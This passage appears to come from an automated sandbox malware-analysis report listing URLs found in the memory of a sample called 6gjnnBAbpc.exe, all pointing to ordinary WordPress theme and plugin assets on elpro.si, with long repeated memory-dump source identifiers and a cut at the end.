6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/yith-woocommerce-wishlist/assets/js/jquery.selectBox.min.js?v
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/yith-woocommerce-wishlist/assets/js/jquery.yith-wcwl.min.js?v
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/themes/elpro/css/style.css?ver=6.1.1
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.464489393.0000000008D4D000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/themes/elpro/favicon.png
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/themes/elpro/img/ICO-30-Kosarica.svg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/themes/elpro/img/ICO-30-Linked-Grey.svg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000002.669997099.0000000008E06000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/themes/elpro/img/ICO-30-Search-Grey.svg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/themes/elpro/img/ICO-30-Search-White.svg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/themes/elpro/js/functions.js?ver=1.0.0
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.464489393.0000000008D20000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/uploads/2020/02/LOGO-Header_new.svg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-includes/css/classic-themes.min.css?ver=1
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-includes/css/dashicons.min.css?ver=6.1.1
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-includes/css/dist/block-library/style.min.css?ver=6.1.1
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 